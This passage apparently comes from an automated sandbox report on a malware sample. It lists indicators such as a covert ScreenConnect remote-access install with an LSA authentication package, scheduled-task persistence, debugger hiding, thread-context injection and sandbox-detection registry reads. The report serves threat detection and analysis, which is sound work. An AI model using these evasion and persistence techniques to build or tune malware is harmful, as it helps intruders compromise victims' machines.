flow ioc 44 raw.githubusercontent.com 45 raw.githubusercontent.com 46 raw.githubusercontent.com 260 raw.githubusercontent.com 261 raw.githubusercontent.com 369 raw.githubusercontent.com -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x0007000000023db2-2796.dat autoit_exe -
Boot or Logon Autostart Execution: Authentication Package 1 TTPs 1 IoCs
Suspicious Windows Authentication Registry Modification.
description ioc Process Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\Authentication Packages = 6d007300760031005f003000000043003a005c00500072006f006700720061006d002000460069006c00650073002000280078003800360029005c00530063007200650065006e0043006f006e006e00650063007400200043006c00690065006e00740020002800390038006100350039006200640030006500650064003900320032003200620029005c00530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f0077007300410075007400680065006e007400690063006100740069006f006e005000610063006b006100670065002e0064006c006c0000000000 msiexec.exe -
Drops file in System32 directory 3 IoCs
description ioc Process File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (98a59bd0eed9222b)\cuqhyro1.tmp ScreenConnect.ClientService.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (98a59bd0eed9222b)\cuqhyro1.newcfg ScreenConnect.ClientService.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log ScreenConnect.WindowsClient.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 24 IoCs
pid Process 2000 c9bad96eda6069fda384604035910ecbb035a5f397ff1f20f890de308eaa7b08.exe 2308 axplong.exe 1724 510c47326c.exe 3144 axplong.exe 2344 49d316d08a.exe 2956 8213f04b29.exe 4084 skotes.exe 860 b8f9100a83.exe 3768 a91d9902ae.exe 5576 3e0edd2e8e.exe 5468 8ebc32d904.exe 6852 7d7d379775.exe 7808 skotes.exe 6660 axplong.exe 6220 1ZC17QQ25ZC2O77CD6KCUVSILGS1MDO.exe 7364 WL4Y4FXIXEA30MCREVVA8ZXBD9L.exe 6048 7d3ca92efa.exe 6096 1e12196e13.exe 6108 1343a45d10.exe 4712 cedb729c19.exe 216 6255b429668f48439480e235dec40213.exe 216 6255b429668f48439480e235dec40213.exe 7316 skotes.exe 5392 axplong.exe -
Suspicious use of SetThreadContext 5 IoCs
description pid Process procid_target PID 2100 set thread context of 6296 2100 d82d5e19cd.exe 183 PID 7192 set thread context of 6340 7192 Intel_PTT_EK_Recertification.exe 218 PID 2024 set thread context of 5160 2024 5f7c680e81.exe 257 PID 6552 set thread context of 6576 6552 8e6fdcba59.exe 267 PID 7272 set thread context of 456 7272 Intel_PTT_EK_Recertification.exe 284 -
resource yara_rule behavioral2/memory/4828-570-0x00007FF7C4B10000-0x00007FF7C4FA0000-memory.dmp upx behavioral2/memory/4828-574-0x00007FF7C4B10000-0x00007FF7C4FA0000-memory.dmp upx -
Drops file in Program Files directory 19 IoCs
description ioc Process File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsBackstageShell.exe msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsClient.exe.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsCredentialProvider.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\app.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\system.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.Windows.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsFileManager.exe.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\Client.en-US.resources msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.ClientService.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsClient.exe msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsFileManager.exe msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\Client.Override.resources msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsAuthenticationPackage.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.Core.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsBackstageShell.exe.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.ClientService.exe msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\Client.Override.en-US.resources msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\Client.resources msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.Client.dll msiexec.exe -
Drops file in Windows directory 15 IoCs
description ioc Process File created C:\Windows\Tasks\axplong.job c9bad96eda6069fda384604035910ecbb035a5f397ff1f20f890de308eaa7b08.exe File created C:\Windows\Installer\e5888e4.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI9825.tmp msiexec.exe File created C:\Windows\Installer\wix{5EE1D23D-9DA7-E002-0FA7-D7C480BA00CD}.SchedServiceConfig.rmi MsiExec.exe File opened for modification C:\Windows\Installer\{5EE1D23D-9DA7-E002-0FA7-D7C480BA00CD}\DefaultIcon msiexec.exe File created C:\Windows\Tasks\skotes.job 8213f04b29.exe File created C:\Windows\Installer\e5888e2.msi msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File created C:\Windows\Installer\SourceHash{5EE1D23D-9DA7-E002-0FA7-D7C480BA00CD} msiexec.exe File opened for modification C:\Windows\Installer\MSI99BC.tmp msiexec.exe File opened for modification C:\Windows\Installer\e5888e2.msi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Installer\MSI972A.tmp msiexec.exe File created C:\Windows\Installer\{5EE1D23D-9DA7-E002-0FA7-D7C480BA00CD}\DefaultIcon msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 4 IoCs
pid pid_target Process procid_target 4284 2344 WerFault.exe 87 5396 4712 WerFault.exe 261 7792 5160 WerFault.exe 257 6492 5160 WerFault.exe 257 -
System Location Discovery: System Language Discovery 1 TTPs 57 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d82d5e19cd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 249e4c4aa2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7d7d379775.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language axplong.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 49d316d08a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d82d5e19cd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language 249e4c4aa2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language c9bad96eda6069fda384604035910ecbb035a5f397ff1f20f890de308eaa7b08.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5f7c680e81.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1ZC17QQ25ZC2O77CD6KCUVSILGS1MDO.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NN9Dd7c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8ebc32d904.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 772e9249c7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ga70pjP.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ee82c69916.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3e0edd2e8e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8e6fdcba59.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8e6fdcba59.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language b8f9100a83.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7d3ca92efa.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1e12196e13.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 002e33e6e2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 05e82532cd5649f38fb77710959e8897.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1343a45d10.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ScreenConnect.ClientService.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WL4Y4FXIXEA30MCREVVA8ZXBD9L.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8213f04b29.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 510c47326c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5f7c680e81.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language a91d9902ae.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 249e4c4aa2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cedb729c19.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ed288029eb9e4563bf671b4ce1f8b61f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 6255b429668f48439480e235dec40213.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 6 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 6696 powershell.exe 7412 PING.EXE 5548 powershell.exe 5244 PING.EXE 6532 powershell.exe 5668 PING.EXE -
Checks SCSI registry key(s) 3 TTPs 5 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000e6cf55ff94a5976e0000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000e6cf55ff0000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff000000000700010000680900e6cf55ff000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1de6cf55ff000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000e6cf55ff00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr vssvc.exe -
Checks processor information in registry 2 TTPs 14 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString ed288029eb9e4563bf671b4ce1f8b61f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 05e82532cd5649f38fb77710959e8897.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 ed288029eb9e4563bf671b4ce1f8b61f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString ScreenConnect.WindowsClient.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 ScreenConnect.WindowsClient.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 05e82532cd5649f38fb77710959e8897.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 952 timeout.exe 5144 timeout.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe -
Kills process with taskkill 5 IoCs
pid Process 8180 taskkill.exe 6040 taskkill.exe 8084 taskkill.exe 6784 taskkill.exe 6776 taskkill.exe -
Modifies data under HKEY_USERS 13 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ ScreenConnect.WindowsClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" ScreenConnect.WindowsClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" ScreenConnect.WindowsClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" ScreenConnect.ClientService.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" ScreenConnect.ClientService.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\26\52C64B7E msiexec.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27 msiexec.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" ScreenConnect.WindowsClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" ScreenConnect.WindowsClient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ ScreenConnect.ClientService.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" ScreenConnect.ClientService.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" ScreenConnect.ClientService.exe -
Modifies registry class 38 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\Assignment = "1" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\SourceList\Media\1 = ";" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-98a59bd0eed9222b\URL Protocol msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\Language = "1033" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\ProductName = "ScreenConnect Client (98a59bd0eed9222b)" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\InstanceType = "0" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\SourceList msiexec.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\Clients = 3a0000000000 msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\sc-98a59bd0eed9222b\shell\open\command msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-03BC-F8663411820C}\InprocServer32 msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-98a59bd0eed9222b\shell\open\command msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\AdvertiseFlags = "388" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\E2D8991B85D0C9C3895AB90DEE9D22B2 msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-98a59bd0eed9222b\UseOriginalUrlEncoding = "1" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-98a59bd0eed9222b\shell msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\D32D1EE57AD9200EF07A7D4C08AB00DC msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\Version = "402849799" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\ProductIcon = "C:\\Windows\\Installer\\{5EE1D23D-9DA7-E002-0FA7-D7C480BA00CD}\\DefaultIcon" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\SourceList\Media msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-03BC-F8663411820C} msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-03BC-F8663411820C}\InprocServer32\ThreadingModel = "Apartment" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-98a59bd0eed9222b\shell\open msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-03BC-F8663411820C}\InprocServer32\ = "C:\\Program Files (x86)\\ScreenConnect Client (98a59bd0eed9222b)\\ScreenConnect.WindowsCredentialProvider.dll" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\DeploymentFlags = "3" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\SourceList\PackageName = "ScreenConnect.ClientSetup.msi" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\sc-98a59bd0eed9222b msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-98a59bd0eed9222b msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.3.7.9067\\98a59bd0eed9222b\\" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.3.7.9067\\98a59bd0eed9222b\\" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\PackageCode = "D32D1EE57AD9200EF07A7D4C08AB00DC" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\AuthorizedLUAApp = "0" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\D32D1EE57AD9200EF07A7D4C08AB00DC\Full msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-98a59bd0eed9222b\shell\open\command\ = "\"C:\\Program Files (x86)\\ScreenConnect Client (98a59bd0eed9222b)\\ScreenConnect.WindowsClient.exe\" \"%1\"" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-03BC-F8663411820C}\ = "ScreenConnect Client (98a59bd0eed9222b) Credential Provider" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\SourceList\Net msiexec.exe Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings firefox.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\E2D8991B85D0C9C3895AB90DEE9D22B2\D32D1EE57AD9200EF07A7D4C08AB00DC msiexec.exe -
Runs ping.exe 1 TTPs 3 IoCs
pid Process 5668 PING.EXE 7412 PING.EXE 5244 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5680 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2000 c9bad96eda6069fda384604035910ecbb035a5f397ff1f20f890de308eaa7b08.exe 2000 c9bad96eda6069fda384604035910ecbb035a5f397ff1f20f890de308eaa7b08.exe 2308 axplong.exe 2308 axplong.exe 1724 510c47326c.exe 1724 510c47326c.exe 3144 axplong.exe 3144 axplong.exe 2344 49d316d08a.exe 2344 49d316d08a.exe 2344 49d316d08a.exe 2344 49d316d08a.exe 2344 49d316d08a.exe 2344 49d316d08a.exe 4832 svchost.exe 4832 svchost.exe 4832 svchost.exe 4832 svchost.exe 2956 8213f04b29.exe 2956 8213f04b29.exe 4084 skotes.exe 4084 skotes.exe 860 b8f9100a83.exe 860 b8f9100a83.exe 5012 NN9Dd7c.exe 860 b8f9100a83.exe 860 b8f9100a83.exe 860 b8f9100a83.exe 860 b8f9100a83.exe 860 b8f9100a83.exe 860 b8f9100a83.exe 860 b8f9100a83.exe 860 b8f9100a83.exe 4364 powershell.exe 4364 powershell.exe 4364 powershell.exe 788 powershell.exe 788 powershell.exe 788 powershell.exe 3768 a91d9902ae.exe 3768 a91d9902ae.exe 2940 ed288029eb9e4563bf671b4ce1f8b61f.exe 2940 ed288029eb9e4563bf671b4ce1f8b61f.exe 2964 msedge.exe 2964 msedge.exe 2372 msedge.exe 2372 msedge.exe 5548 powershell.exe 5548 powershell.exe 5548 powershell.exe 5576 3e0edd2e8e.exe 5576 3e0edd2e8e.exe 5684 identity_helper.exe 5684 identity_helper.exe 5468 8ebc32d904.exe 5468 8ebc32d904.exe 5000 msiexec.exe 5000 msiexec.exe 6296 d82d5e19cd.exe 6296 d82d5e19cd.exe 6560 ScreenConnect.ClientService.exe 6560 ScreenConnect.ClientService.exe 6560 ScreenConnect.ClientService.exe 6560 ScreenConnect.ClientService.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 12 IoCs
pid Process 2372 msedge.exe 2372 msedge.exe 2372 msedge.exe 2372 msedge.exe 2372 msedge.exe 2372 msedge.exe 7256 msedge.exe 7256 msedge.exe 7256 msedge.exe 7256 msedge.exe 7256 msedge.exe 7256 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
